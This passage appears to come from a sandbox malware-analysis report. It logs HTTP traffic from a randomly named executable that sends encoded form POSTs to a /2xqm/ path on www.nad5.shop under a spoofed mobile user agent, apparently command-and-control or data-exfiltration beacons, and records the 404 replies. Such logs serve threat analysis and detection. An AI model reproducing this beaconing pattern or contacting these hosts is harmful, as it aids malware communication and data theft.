                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:38:37.021282911 CEST1236INHTTP/1.1 200 OK
                                      Date: Sun, 22 Sep 2024 15:38:36 GMT
                                      Server: Apache
                                      Referrer-Policy: no-referrer-when-downgrade
                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                      Set-Cookie: vsid=908vr474550716292604510; expires=Fri, 21-Sep-2029 15:38:36 GMT; Max-Age=157680000; path=/; domain=www.yourhomecopilot.online; HttpOnly
                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fRwhuVuxXK0Tjo8JM4kp953IH1XB8VfH+lDB5xWLhLP8nixQumjWAHQq09wbsFnIwZMkNofHCujnDFI3kvIPEQ==
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Data Raw: 61 34 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65
                                      Data Ascii: a469<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanage
                                      Sep 22, 2024 17:38:37.021307945 CEST1236INData Raw: 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c
                                      Data Ascii: r.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdi
                                      Sep 22, 2024 17:38:37.021312952 CEST1236INData Raw: 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73
                                      Data Ascii: function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="lan
                                      Sep 22, 2024 17:38:37.021318913 CEST1236INData Raw: 6d 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c
                                      Data Ascii: mlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.
                                      Sep 22, 2024 17:38:37.021327019 CEST1236INData Raw: 3f 22 26 22 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22
                                      Data Ascii: ?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)
                                      Sep 22, 2024 17:38:37.021332026 CEST1236INData Raw: 6d 65 73 5b 62 5d 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22
                                      Data Ascii: mes[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setA
                                      Sep 22, 2024 17:38:37.021342039 CEST1236INData Raw: 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70
                                      Data Ascii: e.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gp
                                      Sep 22, 2024 17:38:37.021939039 CEST1236INData Raw: 73 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63
                                      Data Ascii: sSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="obje
                                      Sep 22, 2024 17:38:37.021956921 CEST139INData Raw: 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74
                                      Data Ascii: ndow.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefi
                                      Sep 22, 2024 17:38:37.021970034 CEST1236INData Raw: 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f 77 5b 61 5d 2e 6d 73 67 48 61 6e 64 6c 65 72 3d 77 69 6e 64 6f 77 2e 63 6d
                                      Data Ascii: ned"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(typeof(window[a])!=="function
                                      Sep 22, 2024 17:38:37.035906076 CEST1236INData Raw: 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 79 6f 75 72 68 6f 6d 65 63 6f 70 69 6c 6f 74 2e 6f 6e 6c 69 6e 65 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c
                                      Data Ascii: script type="text/javascript" src="http://www.yourhomecopilot.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.1249759156.226.22.233804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:42.285085917 CEST817OUTPOST /2xqm/ HTTP/1.1
                                      Host: www.nad5.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nad5.shop
                                      Referer: http://www.nad5.shop/2xqm/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6c 42 73 7a 79 55 65 36 4d 6b 35 58 70 65 4e 56 4c 74 4c 4b 42 50 2b 73 79 4d 56 6a 6a 48 42 71 45 32 31 69 65 68 5a 79 49 58 56 45 78 48 44 59 72 43 66 78 42 4d 58 4a 34 6d 58 72 4e 6c 36 56 4e 43 6c 48 4a 76 52 37 45 39 6f 4c 6b 43 6d 66 49 54 35 4b 57 4a 77 39 59 56 37 33 2f 54 4c 55 54 72 6d 78 78 6b 77 72 66 70 4d 69 63 51 41 53 64 37 35 54 41 71 31 4e 74 58 6b 4d 69 39 56 38 52 52 4b 4d 79 64 52 45 7a 72 61 69 39 46 48 59 6c 45 6c 75 77 33 77 63 6e 30 65 66 69 51 68 58 55 77 7a 31 42 51 79 35 76 71 6e 47 63 71 46 41 75 7a 61 73 63 49 54 47 53 73 56 49 6d 53 45 71 4a 67 3d 3d
                                      Data Ascii: H2y4Q2Q8=lBszyUe6Mk5XpeNVLtLKBP+syMVjjHBqE21iehZyIXVExHDYrCfxBMXJ4mXrNl6VNClHJvR7E9oLkCmfIT5KWJw9YV73/TLUTrmxxkwrfpMicQASd75TAq1NtXkMi9V8RRKMydREzrai9FHYlEluw3wcn0efiQhXUwz1BQy5vqnGcqFAuzascITGSsVImSEqJg==
                                      Sep 22, 2024 17:38:43.198468924 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.1249760156.226.22.233804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:44.829607964 CEST837OUTPOST /2xqm/ HTTP/1.1
                                      Host: www.nad5.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nad5.shop
                                      Referer: http://www.nad5.shop/2xqm/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6c 42 73 7a 79 55 65 36 4d 6b 35 58 6f 37 46 56 4a 4f 54 4b 49 50 2b 76 34 73 56 6a 73 6e 42 75 45 32 78 69 65 6b 31 45 49 46 78 45 79 69 2f 59 73 44 66 78 47 4d 58 4a 77 47 58 55 43 46 36 6b 4e 43 59 36 4a 71 35 37 45 39 73 4c 6b 47 75 66 49 67 68 4a 56 35 77 2f 45 56 37 70 78 7a 4c 55 54 72 6d 78 78 6b 6c 47 66 70 55 69 64 6a 59 53 62 61 35 55 49 4b 31 4d 39 48 6b 4d 6d 39 56 34 52 52 4b 75 79 65 56 2b 7a 6f 69 69 39 45 33 59 69 51 52 74 2b 48 77 61 6a 30 66 74 69 51 34 2f 56 43 6a 44 63 69 4f 71 77 70 62 71 5a 73 55 61 78 42 53 36 4a 4c 48 4c 66 37 73 34 72 52 35 6a 53 71 53 35 62 51 49 52 67 59 36 45 36 6e 35 4d 34 4b 6f 79 4b 43 30 3d
                                      Data Ascii: H2y4Q2Q8=lBszyUe6Mk5Xo7FVJOTKIP+v4sVjsnBuE2xiek1EIFxEyi/YsDfxGMXJwGXUCF6kNCY6Jq57E9sLkGufIghJV5w/EV7pxzLUTrmxxklGfpUidjYSba5UIK1M9HkMm9V4RRKuyeV+zoii9E3YiQRt+Hwaj0ftiQ4/VCjDciOqwpbqZsUaxBS6JLHLf7s4rR5jSqS5bQIRgY6E6n5M4KoyKC0=
                                      Sep 22, 2024 17:38:45.752445936 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.1249761156.226.22.233804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:47.409567118 CEST1850OUTPOST /2xqm/ HTTP/1.1
                                      Host: www.nad5.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nad5.shop
                                      Referer: http://www.nad5.shop/2xqm/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6c 42 73 7a 79 55 65 36 4d 6b 35 58 6f 37 46 56 4a 4f 54 4b 49 50 2b 76 34 73 56 6a 73 6e 42 75 45 32 78 69 65 6b 31 45 49 46 35 45 79 58 7a 59 71 67 33 78 48 4d 58 4a 78 47 58 56 43 46 36 44 4e 43 77 2b 4a 71 39 42 45 2f 6b 4c 6c 68 75 66 4b 52 68 4a 43 70 77 2f 50 31 37 30 2f 54 4c 4e 54 72 32 4c 78 6b 31 47 66 70 55 69 64 6c 63 53 63 4c 35 55 4f 4b 31 4e 74 58 6b 49 69 39 55 6c 52 52 53 66 79 66 67 4a 6d 4a 43 69 2b 6e 50 59 6e 6a 35 74 34 58 77 59 75 55 66 31 69 51 45 67 56 43 2f 31 63 6d 4f 45 77 75 33 71 55 37 6c 51 70 56 43 4d 54 70 48 78 58 6f 38 4a 6a 54 6c 38 62 61 4b 52 63 57 38 4f 75 4b 6d 51 78 56 63 39 39 4a 73 44 57 6a 7a 37 6f 5a 37 56 4f 77 43 58 2b 4f 65 2f 6c 79 57 42 77 74 44 41 68 47 6c 34 50 46 59 45 56 63 47 32 59 37 41 37 56 4c 33 68 6f 32 4d 48 48 55 43 53 71 67 66 7a 52 49 67 62 6a 4d 5a 35 4d 6b 64 56 41 4d 4c 64 54 41 49 32 43 30 76 76 66 76 4d 71 53 71 4e 4a 70 77 4a 69 4c 75 2f 79 57 70 43 65 67 33 4f 39 76 77 31 7a 6a 7a 35 50 68 41 45 76 68 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=lBszyUe6Mk5Xo7FVJOTKIP+v4sVjsnBuE2xiek1EIF5EyXzYqg3xHMXJxGXVCF6DNCw+Jq9BE/kLlhufKRhJCpw/P170/TLNTr2Lxk1GfpUidlcScL5UOK1NtXkIi9UlRRSfyfgJmJCi+nPYnj5t4XwYuUf1iQEgVC/1cmOEwu3qU7lQpVCMTpHxXo8JjTl8baKRcW8OuKmQxVc99JsDWjz7oZ7VOwCX+Oe/lyWBwtDAhGl4PFYEVcG2Y7A7VL3ho2MHHUCSqgfzRIgbjMZ5MkdVAMLdTAI2C0vvfvMqSqNJpwJiLu/yWpCeg3O9vw1zjz5PhAEvh4VucR2vMJh5Ku6GvHDlims+kP3obc6Caj7WPqqPaHycb3cSesCBPdm5NsLSCsG928cYEIRgfZCVeb32k8yOehGca2HlP+MdYRrSxa70zxHud9pTuZw0xrHMJdvTZY3KCXkzSU1ks+R/jo0aENVgPkej05U66lMjI0xMN9wkNjc18J+KDzh2Aoo041OWlp55CRwc5GqukPSWvbFO1uiXbVfpRK0s8zIKzndm0xHWq4zDnKhpPBFFp4e7gII024hxFqMV/89aJRACSbyknMDzQ2/1+d0Y0G/ck52AxVGw38tas7CycMmeQXpYhCZDkbBhK8ika9t8vUgMbXUtV67vlYHFaJAFSsKXLlr6yv/72KVs6XH9LYXS01A9U143kJ/vj9ycaN6jAqltaKgFOMQHdbpwtjn5lgVy5CCfSGzvbY2Qan2kpw+f5b5e3pSaL8RXpCwW7WfpuOivGqXB2CB3oVTlxW/u6zZ0lUsItGB02CMobTEwogfDUTJj0dDi6IRr9mCpYYhanLTLlm1YTK2ckm1j+itT1IpRVBHXA2y7F+eQo0MPYLV9iul3XN3hA3Tk80Le4R/BRJLRK+Y8akVMQPBCCxdWV4av5j6oHuzVJAOM1IZfRwAkznFEYW3nF++stR3Pwql0/6Ib4AUKoaGv0UmR7OVW0CSb/Uu [TRUNCATED]
                                      Sep 22, 2024 17:38:47.496862888 CEST1236OUTData Raw: 32 79 34 51 32 51 38 3d 6c 42 73 7a 79 55 65 36 4d 6b 35 58 6f 37 46 56 4a 4f 54 4b 49 50 2b 76 34 73 56 6a 73 6e 42 75 45 32 78 69 65 6b 31 45 49 46 35 45 79 58 7a 59 71 67 33 78 48 4d 58 4a 78 47 58 56 43 46 36 44 4e 43 77 2b 4a 71 39 42 45 2f
                                      Data Ascii: 2y4Q2Q8=lBszyUe6Mk5Xo7FVJOTKIP+v4sVjsnBuE2xiek1EIF5EyXzYqg3xHMXJxGXVCF6DNCw+Jq9BE/kLlhufKRhJCpw/P170/TLNTr2Lxk1GfpUidlcScL5UOK1NtXkIi9UlRRSfyfgJmJCi+nPYnj5t4XwYuUf1iQEgVC/1cmOEwu3qU7lQpVCMTpHxXo8JjTl8baKRcW8OuKmQxVc99JsDWjz7oZ7VOwCX+Oe/lyWBwtD
                                      Sep 22, 2024 17:38:48.778551102 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:48 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.1249762156.226.22.233804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:38:49.967986107 CEST551OUTGET /2xqm/?H2y4Q2Q8=oDETxlWYAFo+3slVIYbfKvixoZlHsEllIisreF9SIx9j/XGohAL3BdHT/kHELWqlJj8ALq9Wf9sMlTPRJCB3B/sNJln602quSeae+GkzKeQobAdRTIwOPvg=&Bz=dVmT HTTP/1.1
                                      Host: www.nad5.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:38:50.988328934 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:38:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
